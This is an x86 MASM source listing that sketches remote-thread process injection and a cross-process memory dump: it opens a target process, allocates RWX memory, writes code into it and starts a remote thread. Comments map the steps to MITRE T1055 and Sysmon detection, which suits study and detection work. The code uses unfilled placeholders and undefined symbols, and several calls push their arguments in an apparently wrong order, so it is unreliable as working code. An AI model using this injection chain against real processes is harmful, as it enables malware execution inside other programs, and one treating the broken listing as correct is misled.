; Process Memory Injection and Dumper
.386
.model flat, stdcall
option casemap:none
include windows.inc
include kernel32.inc
includelib kernel32.lib
; Constants
; Page protection and allocation-type values passed to VirtualAllocEx below.
; PAGE_EXECUTE_READWRITE asks for memory that is writable and executable at
; once; RWX private regions inside another process are a common hunting
; indicator for memory scanners and EDR.
PAGE_EXECUTE_READWRITE equ 0x40
MEM_COMMIT equ 0x1000
; Variables
; lpAllocatedMemory - receives the address returned by VirtualAllocEx.
; hProcess          - receives the handle returned by OpenProcess; read by
;                     every later API call and by ReadMemory/WriteMemory.
lpAllocatedMemory dd 0
hProcess dd 0
; lpCode holds the address of myCode. myCode, myMemoryAddress and myBuffer
; are not defined anywhere in this listing.
lpCode dd offset myCode
; dwCodeSize is declared here but not referenced by the code below.
dwCodeSize dd 32
; Source address and local destination buffer used by the ReadProcessMemory
; call at the end of start, with dwBufferSize as the byte count.
lpMemoryAddress dd offset myMemoryAddress
lpBuffer dd offset myBuffer
dwBufferSize dd 1024
; Functions
; Prototypes for the two helper procedures defined after start; each takes
; three dword arguments.
ReadMemory proto lpBaseAddress:dword, lpBuffer:dword, nSize:dword
WriteMemory proto lpBaseAddress:dword, lpBuffer:dword, nSize:dword
.code
; Entry point. Illustrates the textbook remote-thread injection chain,
; OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread,
; followed by a ReadProcessMemory call that copies target memory back into
; this process. The operands written as <...> are unfilled placeholders, so
; the listing is a sketch of the technique rather than a buildable program.
;
; Defender's view: this API sequence is MITRE ATT&CK T1055 (Process
; Injection). Sysmon Event ID 10 (ProcessAccess) records the handle request
; and Event ID 8 (CreateRemoteThread) records the thread creation; the
; cross-process RWX allocation and write in between are what user-mode hooks
; and ETW-based sensors key on. Correlating the steps against one source
; process is more reliable than alerting on any single call.
start:
; Open the target process
; PROCESS_ALL_ACCESS requests every access right on the target. Such a broad
; mask on a handle to an unrelated process stands out in process-access
; telemetry and is worth alerting on by itself.
invoke OpenProcess, PROCESS_ALL_ACCESS, FALSE, <target_process_id>
; eax (the OpenProcess result) is stored without being tested.
mov hProcess, eax
; Allocate memory in the target process
; Requests a committed, read/write/execute region via VirtualAllocEx.
push 0
push <memory_size>
push MEM_COMMIT
push PAGE_EXECUTE_READWRITE
push hProcess
call VirtualAllocEx
; Remember the address returned in eax for the write and thread steps.
mov lpAllocatedMemory, eax
; Inject code into the target process
; Cross-process write into the region allocated above.
push lpAllocatedMemory
push offset lpCode
push <code_size>
push hProcess
call WriteProcessMemory
; Execute the injected code
; Starts a thread in the target; lpAllocatedMemory is the only non-zero
; value pushed besides the process handle.
push 0
push 0
push lpAllocatedMemory
push 0
push 0
push 0
push hProcess
call CreateRemoteThread
; Dump memory from the target process
; Cross-process read using the lpMemoryAddress / lpBuffer / dwBufferSize
; globals declared above.
push lpMemoryAddress
push lpBuffer
push dwBufferSize
push 0
push hProcess
call ReadProcessMemory
; Exit the program
; Only the process handle is closed; the value returned by
; CreateRemoteThread is never saved or closed.
invoke CloseHandle, hProcess
ret
; Read memory from the target process
; ReadMemory(lpBaseAddress, lpBuffer, nSize), stdcall.
; Thin wrapper around ReadProcessMemory that uses the global hProcess as the
; process handle. Whatever ReadProcessMemory leaves in eax is returned
; unchanged. Not called from start in this listing.
ReadMemory proc lpBaseAddress:dword, lpBuffer:dword, nSize:dword
; Set up an ebp-based frame so the arguments can be addressed as [ebp+N].
push ebp
mov ebp, esp
push 0
push hProcess
; The three caller-supplied dwords, taken from the frame.
push[ebp+8]
push[ebp+12]
push[ebp+16]
call ReadProcessMemory
pop ebp
; stdcall: the callee removes its three dword arguments (12 bytes).
ret 12
ReadMemory endp
; Write memory to the target process
; WriteMemory(lpBaseAddress, lpBuffer, nSize), stdcall.
; Thin wrapper around WriteProcessMemory that uses the global hProcess as
; the process handle. Whatever WriteProcessMemory leaves in eax is returned
; unchanged. Not called from start in this listing.
WriteMemory proc lpBaseAddress:dword, lpBuffer:dword, nSize:dword
; Set up an ebp-based frame so the arguments can be addressed as [ebp+N].
push ebp
mov ebp, esp
push 0
push hProcess
; The three caller-supplied dwords, taken from the frame.
push[ebp+8]
push[ebp+12]
push[ebp+16]
call WriteProcessMemory
pop ebp
; stdcall: the callee removes its three dword arguments (12 bytes).
ret 12
WriteMemory endp
end start